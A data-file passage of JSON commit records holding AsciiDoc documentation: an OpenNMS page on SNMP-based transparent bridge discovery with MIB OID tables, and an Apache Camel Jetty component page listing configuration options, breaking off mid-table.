bridge-discovery.adoc","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/enlinkd\/layer-2\/bridge-discovery.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/enlinkd\/layer-2\/bridge-discovery.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/..\/images\n\n==== Transparent Bridge Discovery\n\nDiscovering _Layer 2_ network links using the _Bridge Forwarding_ table requires a special algorithm.\nTo discover _Links_ an algorithm based on a scientific paper with the title link:http:\/\/cs-pub.bu.edu\/groups\/nrg\/readinglist\/lowekamp-sigcomm01.pdf[Topology Discovery for Large Ethernet Networks] is implemented.\nThe gathered information is used to classify _Links_ in _macLink_ and _bridgeLink_.\nA _macLink_ represents a _Link_ between a workstation or server identified by a mac address.\nA _bridgeLink_ is a _connection_ between backbone ports.\n\nTransparent bridging is not loop free so if you have loops you have to enable the spanning tree protocol that will detect loops and again will put some ports in a _blocking_ state to avoid loops.\nTo get links it is necessary to perform some calculations that let us define the _Links_.\nThe following _MIBS_ must be supported by the _SNMP agent_ to allow _Transparent Bridge Discovery_.\n\n.Supported MIBS from the Cisco-VTP MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _vtpVersion_ | `.1.3.6.1.4.1.9.9.46.1.1.1.0` | The version of VTP in use on the local system.\n A device will report its version capability and not any particular version in use on the device.\n If the device does not support _VTP_, the version is _none(3)_.\n|===\n\n.Supported OIDs from the IP-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _ipNetToMediaIfIndex_ | `.1.3.6.1.2.1.4.22.1.1` | The interface on which this entry's equivalence is effective.\n The layer-2 interface identified by a particular value of this index is the same interface as identified by the same value of _ifIndex_.\n| _ipNetToMediaPhysAddress_ | `.1.3.6.1.2.1.4.22.1.2` | The media-dependent _physical_ address.\n| _ipNetToMediaNetAddress_ | `.1.3.6.1.2.1.4.22.1.3` | The _IpAddress_ corresponding to the media-dependent _physical_ address.\n| _ipNetToMediaType_ | `.1.3.6.1.2.1.4.22.1.4` | The type of mapping. Setting this object to the value _invalid(2)_ has the effect of invalidating the corresponding entry in the _ipNetToMediaTable_.\n That is, it effectively dissasociates the interface identified with said entry from the mapping identified with said entry.\n It is an implementation-specific matter as to whether the agent removes an invalidated entry from the table.\n Accordingly, management stations must be prepared to receive tabular information from agents that corresponds to entries not currently in use.\n Proper interpretation of such entries requires examination of the relevant _ipNetToMediaType_ object.\n|===\n\n.Supported OIDS from the BRIDGE-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _dot1dBaseBridgeAddress_ | `.1.3.6.1.2.1.17.1.1.0` | The MAC address used by this bridge when it must be referred to in a unique fashion.\n It is recommended that this be the numerically smallest MAC address of all ports that belong to this bridge.\n However it is only required to be unique.\n When concatenated with _dot1dStpPriority_ a unique _BridgeIdentifier_ is formed which is used in the _Spanning Tree Protocol_.\n| _dot1dBaseNumPorts_ | `.1.3.6.1.2.1.17.1.2.0` | The number of ports controlled by this bridging entity.\n| _dot1dBaseType_ | `.1.3.6.1.2.1.17.1.3.0` | Indicates what type of bridging this bridge can perform.\n If a bridge is actually performing a certain type of bridging this will be indicated by entries in the port table for the given type.\n| _dot1dBasePort_ | `.1.3.6.1.2.1.17.1.4.1.1` | The port number of the port for which this entry contains bridge management information.\n| _dot1dPortIfIndex_ | `.1.3.6.1.2.1.17.1.4.1.2` | The value of the instance of the _ifIndex_ object, defined in _MIB-II_, for the interface corresponding to this port.\n| _dot1dStpProtocolSpecification_ | `.1.3.6.1.2.1.17.2.1.0` | An indication of what version of the Spanning Tree Protocol is being run.\n The value _decLb100(2)_ indicates the _DEC LANbridge 100 Spanning Tree protocol_.\n _IEEE 802.1d_ implementations will return _ieee8021d(3)_.\n If future versions of the _IEEE Spanning Tree Protocol_ are released that are incompatible with the current version a new value will be defined.\n| _dot1dStpPriority_ | `.1.3.6.1.2.1.17.2.2` | The value of the writeable portion of the _Bridge ID_, i.e., the first two octets of the (8 octet long) _Bridge ID_.\n The other (last) 6 octets of the _Bridge ID_ are given by the value of _dot1dBaseBridgeAddress_.\n| _dot1dStpDesignatedRoot_ | `.1.3.6.1.2.1.17.2.5` | The bridge identifier of the root of the spanning tree as determined by the _Spanning Tree Protocol_ as executed by this node.\n This value is used as the _Root Identifier_ parameter in all configuration _Bridge PDUs_ originated by this node.\n| _dot1dStpRootCost_ | `.1.3.6.1.2.1.17.2.6` | The cost of the path to the root as seen from this bridge.\n| _dot1dStpRootPort_ | `.1.3.6.1.2.1.17.2.7` | The port number of the port which offers the lowest cost path from this bridge to the root bridge.\n| _dot1dStpPort_ | `.1.3.6.1.2.1.17.2.15.1.1` | The port number of the port for which this entry contains Spanning Tree Protocol management information.\n| _dot1dStpPortPriority_ | `.1.3.6.1.2.1.17.2.15.1.2` | The value of the priority field which is contained in the first (in network byte order) octet of the (2 octet long) Port ID.\n The other octet of the Port ID is given by the value of _dot1dStpPort_.\n| _dot1dStpPortState_ | `.1.3.6.1.2.1.17.2.15.1.3` | The port's current state as defined by application of the _Spanning Tree Protocol_.\n This state controls what action a port takes on reception of a frame.\n If the bridge has detected a port that is malfunctioning it will place that port into the _broken(6)_ state.\n For ports which are disabled (see _dot1dStpPortEnable_), this object will have a value of _disabled(1)_.\n| _dot1dStpPortEnable_ | `.1.3.6.1.2.1.17.2.15.1.4` | The enabled\/disabled status of the port.\n| _dot1dStpPortPathCost_ | `.1.3.6.1.2.1.17.2.15.1.5` | The contribution of this port to the path cost of paths towards the spanning tree root which include this port.\n 802.1D-1990 recommends that the default value of this parameter be in inverse proportion to the speed of the attached LAN.\n| _dot1dStpPortDesignatedRoot_ | `.1.3.6.1.2.1.17.2.15.1.6` | The unique _Bridge Identifier_ of the _Bridge_ recorded as the _Root_ in the _Configuration BPDUs_ transmitted by the _Designated Bridge_ for the segment to which the port is attached.\n| _dot1dStpPortDesignatedCost_ | `.1.3.6.1.2.1.17.2.15.1.7` | The path cost of the _Designated Port_ of the segment connected to this port.\n This value is compared to the _Root Path Cost_ field in received bridge _PDUs_.\n| _dot1dStpPortDesignatedBridge_ | `.1.3.6.1.2.1.17.2.15.1.8` | The _Bridge Identifier_ of the bridge which this port considers to be the _Designated Bridge_ for this port's segment.\n| _dot1dStpPortDesignatedPort_ | `.1.3.6.1.2.1.17.2.15.1.9` | The _Port Identifier_ of the port on the _Designated Bridge_ for this port's segment.\n| _dot1dTpFdbAddress_ | `.1.3.6.1.2.1.17.4.3.1.1` | A unicast _MAC address_ for which the bridge has forwarding and\/or filtering information.\n| _dot1dTpFdbPort_ | `.1.3.6.1.2.1.17.4.3.1.2` | Either the value '0', or the port number of the port on which a frame having a source address equal to the value of the corresponding instance of _dot1dTpFdbAddress_ has been seen.\n A value of '0' indicates that the port number has not been learned but that the bridge does have some forwarding\/filtering information about this address (e.g. in the _dot1dStaticTable_).\n Implementors are encouraged to assign the port value to this object whenever it is learned even for addresses for which the corresponding value of _dot1dTpFdbStatus_ is not _learned(3)_.\n| _dot1dTpFdbStatus_ | `.1.3.6.1.2.1.17.4.3.1.3` | The status of this entry.\n The meanings of the values are: +\n *_other(1)_*: none of the following.\n This would include the case where some other _MIB_ object (not the corresponding instance of _dot1dTpFdbPort_, nor an entry in the _dot1dStaticTable_) is being used to determine if and how frames addressed to the value of the corresponding instance of _dot1dTpFdbAddress_ are being forwarded. +\n *_invalid(2)_*: this entry is not longer valid (e.g., it was learned but has since aged-out), but has not yet been flushed from the table. +\n *_learned(3)_*: the value of the corresponding instance of _dot1dTpFdbPort_ was learned, and is being used. +\n *_self(4)_*: the value of the corresponding instance of _dot1dTpFdbAddress_ represents one of the bridge's addresses.\n The corresponding instance of _dot1dTpFdbPort_ indicates which of the bridge's ports has this address. +\n *_mgmt(5)_*: the value of the corresponding instance of dot1dTpFdbAddress is also the value of an existing instance of dot1dStaticAddress.\n|===\n\n.Supported OIDS from the Q-BRIDGE-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _dot1qTpFdbPort_ | `.1.3.6.1.2.1.17.7.1.2.2.1.2` | Either the value _0_, or the port number of the port on which a frame having a source address equal to the value of the corresponding instance of _dot1qTpFdbAddress_ has been seen.\n A value of _0_ indicates that the port number has not been learned but that the device does have some forwarding\/filtering information about this address (e.g., in the _dot1qStaticUnicastTable_).\n Implementors are encouraged to assign the port value to this object whenever it is learned, even for addresses for which the corresponding value of _dot1qTpFdbStatus_ is not _learned(3)_.\n| _dot1qTpFdbStatus_ | `.1.3.6.1.2.1.17.7.1.2.2.1.3` | The status of this entry.\n The meanings of the values are: +\n *_other(1)_*: none of the following.\n This may include the case where some other MIB object (not the corresponding instance of _dot1qTpFdbPort_, nor an entry in the _dot1qStaticUnicastTable_) is being used to determine if and how frames addressed to the value of the corresponding instance of _dot1qTpFdbAddress_ are being forwarded. +\n *_invalid(2)_*: this entry is no longer valid (e.g., it was learned but has since aged out), but has not yet been flushed from the table. +\n *_learned(3)_*: the value of the corresponding instance of _dot1qTpFdbPort_ was learned and is being used. +\n *_self(4)_*: the value of the corresponding instance of _dot1qTpFdbAddress_ represents one of the device's addresses.\n The corresponding instance of _dot1qTpFdbPort_ indicates which of the device's ports has this address. +\n *_mgmt(5)_*: the value of the corresponding instance of _dot1qTpFdbAddress_ is also the value of an existing instance of _dot1qStaticAddress_.\n|===\n\nGeneric information about the _bridge_ link discovery process can be found in the _Bridge Information_ box on the _Node Detail Page_ of the device.\nInformation gathered from this _OID_ will be stored in the following database table:\n\n.Database tables related to transparent bridge discovery\nimage::enlinkd\/bridge-database.png[]\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/..\/images\n\n==== Transparent Bridge Discovery\n\nDiscovering _Layer 2_ network links using the _Bridge Forwarding_ table requires a special algorithm.\nTo discover _Links_ an algorithm based on a scientific paper with the title link:http:\/\/cs-pub.bu.edu\/groups\/nrg\/readinglist\/lowekamp-sigcomm01.pdf[Topology Discovery for Large Ethernet Networks] is implemented.\nThe gathered information is used to classify _Links_ in _macLink_ and _bridgeLink_.\nA _macLink_ represents a _Link_ between a workstation or server identified by a mac address.\nA _bridgeLink_ is a _connection_ between backbone ports.\n\nTransparent bridging is not loop free so if you have loops you have to enable the spanning tree protocol that will detect loops and again will put some ports in a _blocking_ state to avoid loops.\nTo get links it is necessary to perform some calculations that let us define the _Links_.\nThe following _MIBS_ must be supported by the _SNMP agent_ to allow _Transparent Bridge Discovery_.\n\n.Supported MIBS from the Cisco-VTP MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _vtpVersion_ | `.1.3.6.1.4.1.9.9.46.1.1.1.0` | The version of VTP in use on the local system.\n A device will report its version capability and not any particular version in use on the device.\n If the device does not support _VTP_, the version is _none(3)_.\n|===\n\n.Supported MIBS from the IP-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _ipNetToMediaIfIndex_ | `.1.3.6.1.2.1.4.22.1.1` | The interface on which this entry's equivalence is effective.\n The layer-2 interface identified by a particular value of this index is the same interface as identified by the same value of _ifIndex_.\n| _ipNetToMediaPhysAddress_ | `.1.3.6.1.2.1.4.22.1.2` | The media-dependent _physical_ address.\n| _ipNetToMediaNetAddress_ | `.1.3.6.1.2.1.4.22.1.3` | The _IpAddress_ corresponding to the media-dependent _physical_ address.\n| _ipNetToMediaType_ | `.1.3.6.1.2.1.4.22.1.4` | The type of mapping. Setting this object to the value _invalid(2)_ has the effect of invalidating the corresponding entry in the _ipNetToMediaTable_.\n That is, it effectively dissasociates the interface identified with said entry from the mapping identified with said entry.\n It is an implementation-specific matter as to whether the agent removes an invalidated entry from the table.\n Accordingly, management stations must be prepared to receive tabular information from agents that corresponds to entries not currently in use.\n Proper interpretation of such entries requires examination of the relevant _ipNetToMediaType_ object.\n|===\n\n.Supported OIDS from the BRIDGE-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _dot1dBaseBridgeAddress_ | `.1.3.6.1.2.1.17.1.1.0` | The MAC address used by this bridge when it must be referred to in a unique fashion.\n It is recommended that this be the numerically smallest MAC address of all ports that belong to this bridge.\n However it is only required to be unique.\n When concatenated with _dot1dStpPriority_ a unique _BridgeIdentifier_ is formed which is used in the _Spanning Tree Protocol_.\n| _dot1dBaseNumPorts_ | `.1.3.6.1.2.1.17.1.2.0` | The number of ports controlled by this bridging entity.\n| _dot1dBaseType_ | `.1.3.6.1.2.1.17.1.3.0` | Indicates what type of bridging this bridge can perform.\n If a bridge is actually performing a certain type of bridging this will be indicated by entries in the port table for the given type.\n| _dot1dBasePort_ | `.1.3.6.1.2.1.17.1.4.1.1` | The port number of the port for which this entry contains bridge management information.\n| _dot1dPortIfIndex_ | `.1.3.6.1.2.1.17.1.4.1.2` | The value of the instance of the _ifIndex_ object, defined in _MIB-II_, for the interface corresponding to this port.\n| _dot1dStpProtocolSpecification_ | `.1.3.6.1.2.1.17.2.1.0` | An indication of what version of the Spanning Tree Protocol is being run.\n The value _decLb100(2)_ indicates the _DEC LANbridge 100 Spanning Tree protocol_.\n _IEEE 802.1d_ implementations will return _ieee8021d(3)_.\n If future versions of the _IEEE Spanning Tree Protocol_ are released that are incompatible with the current version a new value will be defined.\n| _dot1dStpPriority_ | `.1.3.6.1.2.1.17.2.2` | The value of the writeable portion of the _Bridge ID_, i.e., the first two octets of the (8 octet long) _Bridge ID_.\n The other (last) 6 octets of the _Bridge ID_ are given by the value of _dot1dBaseBridgeAddress_.\n| _dot1dStpDesignatedRoot_ | `.1.3.6.1.2.1.17.2.5` | The bridge identifier of the root of the spanning tree as determined by the _Spanning Tree Protocol_ as executed by this node.\n This value is used as the _Root Identifier_ parameter in all configuration _Bridge PDUs_ originated by this node.\n| _dot1dStpRootCost_ | `.1.3.6.1.2.1.17.2.6` | The cost of the path to the root as seen from this bridge.\n| _dot1dStpRootPort_ | `.1.3.6.1.2.1.17.2.7` | The port number of the port which offers the lowest cost path from this bridge to the root bridge.\n| _dot1dStpPort_ | `.1.3.6.1.2.1.17.2.15.1.1` | The port number of the port for which this entry contains Spanning Tree Protocol management information.\n| _dot1dStpPortPriority_ | `.1.3.6.1.2.1.17.2.15.1.2` | The value of the priority field which is contained in the first (in network byte order) octet of the (2 octet long) Port ID.\n The other octet of the Port ID is given by the value of _dot1dStpPort_.\n| _dot1dStpPortState_ | `.1.3.6.1.2.1.17.2.15.1.3` | The port's current state as defined by application of the _Spanning Tree Protocol_.\n This state controls what action a port takes on reception of a frame.\n If the bridge has detected a port that is malfunctioning it will place that port into the _broken(6)_ state.\n For ports which are disabled (see _dot1dStpPortEnable_), this object will have a value of _disabled(1)_.\n| _dot1dStpPortEnable_ | `.1.3.6.1.2.1.17.2.15.1.4` | The enabled\/disabled status of the port.\n| _dot1dStpPortPathCost_ | `.1.3.6.1.2.1.17.2.15.1.5` | The contribution of this port to the path cost of paths towards the spanning tree root which include this port.\n 802.1D-1990 recommends that the default value of this parameter be in inverse proportion to the speed of the attached LAN.\n| _dot1dStpPortDesignatedRoot_ | `.1.3.6.1.2.1.17.2.15.1.6` | The unique _Bridge Identifier_ of the _Bridge_ recorded as the _Root_ in the _Configuration BPDUs_ transmitted by the _Designated Bridge_ for the segment to which the port is attached.\n| _dot1dStpPortDesignatedCost_ | `.1.3.6.1.2.1.17.2.15.1.7` | The path cost of the _Designated Port_ of the segment connected to this port.\n This value is compared to the _Root Path Cost_ field in received bridge _PDUs_.\n| _dot1dStpPortDesignatedBridge_ | `.1.3.6.1.2.1.17.2.15.1.8` | The _Bridge Identifier_ of the bridge which this port considers to be the _Designated Bridge_ for this port's segment.\n| _dot1dStpPortDesignatedPort_ | `.1.3.6.1.2.1.17.2.15.1.9` | The _Port Identifier_ of the port on the _Designated Bridge_ for this port's segment.\n| _dot1dTpFdbAddress_ | `.1.3.6.1.2.1.17.4.3.1.1` | A unicast _MAC address_ for which the bridge has forwarding and\/or filtering information.\n| _dot1dTpFdbPort_ | `.1.3.6.1.2.1.17.4.3.1.2` | Either the value '0', or the port number of the port on which a frame having a source address equal to the value of the corresponding instance of _dot1dTpFdbAddress_ has been seen.\n A value of '0' indicates that the port number has not been learned but that the bridge does have some forwarding\/filtering information about this address (e.g. in the _dot1dStaticTable_).\n Implementors are encouraged to assign the port value to this object whenever it is learned even for addresses for which the corresponding value of _dot1dTpFdbStatus_ is not _learned(3)_.\n| _dot1dTpFdbStatus_ | `.1.3.6.1.2.1.17.4.3.1.3` | The status of this entry.\n The meanings of the values are: +\n *_other(1)_*: none of the following.\n This would include the case where some other _MIB_ object (not the corresponding instance of _dot1dTpFdbPort_, nor an entry in the _dot1dStaticTable_) is being used to determine if and how frames addressed to the value of the corresponding instance of _dot1dTpFdbAddress_ are being forwarded. +\n *_invalid(2)_*: this entry is not longer valid (e.g., it was learned but has since aged-out), but has not yet been flushed from the table. +\n *_learned(3)_*: the value of the corresponding instance of _dot1dTpFdbPort_ was learned, and is being used. +\n *_self(4)_*: the value of the corresponding instance of _dot1dTpFdbAddress_ represents one of the bridge's addresses.\n The corresponding instance of _dot1dTpFdbPort_ indicates which of the bridge's ports has this address. +\n *_mgmt(5)_*: the value of the corresponding instance of dot1dTpFdbAddress is also the value of an existing instance of dot1dStaticAddress.\n|===\n\n.Supported OIDS from the Q-BRIDGE-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _dot1qTpFdbPort_ | `.1.3.6.1.2.1.17.7.1.2.2.1.2` | Either the value _0_, or the port number of the port on which a frame having a source address equal to the value of the corresponding instance of _dot1qTpFdbAddress_ has been seen.\n A value of _0_ indicates that the port number has not been learned but that the device does have some forwarding\/filtering information about this address (e.g., in the _dot1qStaticUnicastTable_).\n Implementors are encouraged to assign the port value to this object whenever it is learned, even for addresses for which the corresponding value of _dot1qTpFdbStatus_ is not _learned(3)_.\n| _dot1qTpFdbStatus_ | `.1.3.6.1.2.1.17.7.1.2.2.1.3` | The status of this entry.\n The meanings of the values are: +\n *_other(1)_*: none of the following.\n This may include the case where some other MIB object (not the corresponding instance of _dot1qTpFdbPort_, nor an entry in the _dot1qStaticUnicastTable_) is being used to determine if and how frames addressed to the value of the corresponding instance of _dot1qTpFdbAddress_ are being forwarded. +\n *_invalid(2)_*: this entry is no longer valid (e.g., it was learned but has since aged out), but has not yet been flushed from the table. +\n *_learned(3)_*: the value of the corresponding instance of _dot1qTpFdbPort_ was learned and is being used. +\n *_self(4)_*: the value of the corresponding instance of _dot1qTpFdbAddress_ represents one of the device's addresses.\n The corresponding instance of _dot1qTpFdbPort_ indicates which of the device's ports has this address. +\n *_mgmt(5)_*: the value of the corresponding instance of _dot1qTpFdbAddress_ is also the value of an existing instance of _dot1qStaticAddress_.\n|===\n\nGeneric information about the _bridge_ link discovery process can be found in the _Bridge Information_ box on the _Node Detail Page_ of the device.\nInformation gathered from this _OID_ will be stored in the following database table:\n\n.Database tables related to transparent bridge discovery\nimage::enlinkd\/bridge-database.png[]\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e3842ea0a767d36881e593f0b6dd11bc0d457fec","subject":"Regen","message":"Regen\n","repos":"christophd\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,pax95\/camel,cunningt\/camel,mcollovati\/camel,apache\/camel,mcollovati\/camel,mcollovati\/camel,adessaigne\/camel,apache\/camel,gnodet\/camel,DariusX\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nicolaferraro\/camel,pmoerenhout\/camel,alvinkwekel\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tdiesler\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,gnodet\/camel,christophd\/camel,nicolaferraro\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,mcollovati\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,gnodet\/camel,tdiesler\/camel,tadayosi\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,nikhilvibhav\/camel,tdiesler\/camel,alvinkwekel\/camel,nicolaferraro\/camel,adessaigne\/camel,DariusX\/camel,pax95\/camel,cunningt\/camel,DariusX\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,pax95\/camel,cunningt\/camel,christophd\/camel,alvinkwekel\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,cunningt\/camel,christophd\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,nicolaferraro\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/jetty-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/jetty-component.adoc","new_contents":"[[jetty-component]]\n= Jetty Component\n:page-source: components\/camel-jetty\/src\/main\/docs\/jetty-component.adoc\n\n*Since Camel 1.2*\n\n\/\/ HEADER START\n*Only consumer is supported*\n\/\/ HEADER END\n\nThe Jetty component provides HTTP-based endpoints\nfor consuming and producing HTTP requests. That is, the Jetty component\nbehaves as a simple Web server.\n\n*Stream*\n\nThe `assert` call appears in this example, because the code is part of\nan unit test.Jetty is stream based, which means the input it receives is\nsubmitted to Camel as a stream. That means you will only be able to read\nthe content of the stream *once*. +\nIf you find a situation where the message body appears to be empty or\nyou need to access the Exchange.HTTP_RESPONSE_CODE data multiple times\n(e.g.: doing multicasting, or redelivery error handling), you should use\nStream caching or convert the message body to\na `String` which is safe to be re-read multiple times.\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-jetty<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n== URI format\n\n[source,text]\n----\njetty:http:\/\/hostname[:port][\/resourceUri][?options]\n----\n\nYou can append query options to the URI in the following format,\n`?option=value&option=value&...`\n\n== Options\n\n\n\n\n\n\/\/ component options: START\nThe Jetty component supports 32 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *continuationTimeout* (consumer) | Allows to set a timeout in millis when using Jetty as consumer (server). By default Jetty uses 30000. You can use a value of = 0 to never expire. If a timeout occurs then the request will be expired and Jetty will return back a http error 503 to the client. This option is only in use when using Jetty with the Asynchronous Routing Engine. | 30000 | Long\n| *enableJmx* (consumer) | If this option is true, Jetty JMX support will be enabled for this endpoint. | false | boolean\n| *maxThreads* (consumer) | To set a value for maximum number of threads in server thread pool. Notice that both a min and max size must be configured. | | Integer\n| *minThreads* (consumer) | To set a value for minimum number of threads in server thread pool. Notice that both a min and max size must be configured. | | Integer\n| *requestBufferSize* (consumer) | Allows to configure a custom value of the request buffer size on the Jetty connectors. | | Integer\n| *requestHeaderSize* (consumer) | Allows to configure a custom value of the request header size on the Jetty connectors. | | Integer\n| *responseBufferSize* (consumer) | Allows to configure a custom value of the response buffer size on the Jetty connectors. | | Integer\n| *responseHeaderSize* (consumer) | Allows to configure a custom value of the response header size on the Jetty connectors. | | Integer\n| *sendServerVersion* (consumer) | If the option is true, jetty will send the server header with the jetty version information to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | true | boolean\n| *useContinuation* (consumer) | Whether or not to use Jetty continuations for the Jetty Server. | true | boolean\n| *useXForwardedForHeader* (consumer) | To use the X-Forwarded-For header in HttpServletRequest.getRemoteAddr. | false | boolean\n| *threadPool* (consumer) | To use a custom thread pool for the server. This option should only be used in special circumstances. | | ThreadPool\n| *allowJavaSerializedObject* (advanced) | Whether to allow java serialization when a request uses context-type=application\/x-java-serialized-object. This is by default turned off. If you enable this then be aware that Java will deserialize the incoming data from the request to Java and that can be a potential security risk. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *errorHandler* (advanced) | This option is used to set the ErrorHandler that Jetty server uses. | | ErrorHandler\n| *httpBinding* (advanced) | Not to be used - use JettyHttpBinding instead. | | HttpBinding\n| *httpConfiguration* (advanced) | Jetty component does not use HttpConfiguration. | | HttpConfiguration\n| *jettyHttpBinding* (advanced) | To use a custom org.apache.camel.component.jetty.JettyHttpBinding, which are used to customize how a response should be written for the producer. | | JettyHttpBinding\n| *mbContainer* (advanced) | To use a existing configured org.eclipse.jetty.jmx.MBeanContainer if JMX is enabled that Jetty uses for registering mbeans. | | MBeanContainer\n| *headerFilterStrategy* (filter) | To use a custom org.apache.camel.spi.HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *proxyHost* (proxy) | To use a http proxy to configure the hostname. | | String\n| *proxyPort* (proxy) | To use a http proxy to configure the port number. | | Integer\n| *keystore* (security) | Specifies the location of the Java keystore file, which contains the Jetty server's own X.509 certificate in a key entry. | | String\n| *socketConnectorProperties* (security) | A map which contains general HTTP connector properties. Uses the same principle as sslSocketConnectorProperties. | | Map\n| *socketConnectors* (security) | A map which contains per port number specific HTTP connectors. Uses the same principle as sslSocketConnectors. | | Map\n| *sslContextParameters* (security) | To configure security using SSLContextParameters | | SSLContextParameters\n| *sslKeyPassword* (security) | The key password, which is used to access the certificate's key entry in the keystore (this is the same password that is supplied to the keystore command's -keypass option). | | String\n| *sslPassword* (security) | The ssl password, which is required to access the keystore file (this is the same password that is supplied to the keystore command's -storepass option). | | String\n| *sslSocketConnectorProperties* (security) | A map which contains general SSL connector properties. | | Map\n| *sslSocketConnectors* (security) | A map which contains per port number specific SSL connectors. | | Map\n| *useGlobalSslContextParameters* (security) | Enable usage of global SSL context parameters | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\n\n\n\n\n\/\/ endpoint options: START\nThe Jetty endpoint is configured using URI syntax:\n\n----\njetty:httpUri\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *httpUri* | *Required* The url of the HTTP endpoint to call. | | URI\n|===\n\n\n=== Query Parameters (34 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *disableStreamCache* (common) | Determines whether or not the raw input stream from Servlet is cached or not (Camel will read the stream into a in memory\/overflow to file, Stream caching) cache. By default Camel will cache the Servlet input stream to support reading it multiple times to ensure it Camel can retrieve all data from the stream. However you can set this option to true when you for example need to access the raw stream, such as streaming it directly to a file or other persistent store. DefaultHttpBinding will copy the request input stream into a stream cache and put it into message body if this option is false to support reading the stream multiple times. If you use Servlet to bridge\/proxy an endpoint then consider enabling this option to improve performance, in case you do not need to read the message payload multiple times. The http producer will by default cache the response body stream. If setting this option to true, then the producers will not cache the response body stream but use the response stream as-is as the message body. | false | boolean\n| *headerFilterStrategy* (common) | To use a custom HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *httpBinding* (common) | To use a custom HttpBinding to control the mapping between Camel message and HttpClient. | | HttpBinding\n| *async* (consumer) | Configure the consumer to work in async mode | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *chunked* (consumer) | If this option is false the Servlet will disable the HTTP streaming and set the content-length header on the response | true | boolean\n| *continuationTimeout* (consumer) | Allows to set a timeout in millis when using Jetty as consumer (server). By default Jetty uses 30000. You can use a value of = 0 to never expire. If a timeout occurs then the request will be expired and Jetty will return back a http error 503 to the client. This option is only in use when using Jetty with the Asynchronous Routing Engine. | 30000 | Long\n| *enableCORS* (consumer) | If the option is true, Jetty server will setup the CrossOriginFilter which supports the CORS out of box. | false | boolean\n| *enableJmx* (consumer) | If this option is true, Jetty JMX support will be enabled for this endpoint. See Jetty JMX support for more details. | false | boolean\n| *enableMultipartFilter* (consumer) | Whether org.apache.camel.component.jetty.MultiPartFilter is enabled or not. You should set this value to false when bridging endpoints, to ensure multipart requests is proxied\/bridged as well. | false | boolean\n| *httpMethodRestrict* (consumer) | Used to only allow consuming if the HttpMethod matches, such as GET\/POST\/PUT etc. Multiple methods can be specified separated by comma. | | String\n| *matchOnUriPrefix* (consumer) | Whether or not the consumer should try to find a target consumer by matching the URI prefix if no exact match is found. | false | boolean\n| *muteException* (consumer) | If enabled and an Exchange failed processing on the consumer side the response's body won't contain the exception's stack trace. | false | boolean\n| *responseBufferSize* (consumer) | To use a custom buffer size on the javax.servlet.ServletResponse. | | Integer\n| *sendDateHeader* (consumer) | If the option is true, jetty server will send the date header to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | false | boolean\n| *sendServerVersion* (consumer) | If the option is true, jetty will send the server header with the jetty version information to the client which sends the request. NOTE please make sure there is no any other camel-jetty endpoint is share the same port, otherwise this option may not work as expected. | true | boolean\n| *sessionSupport* (consumer) | Specifies whether to enable the session manager on the server side of Jetty. | false | 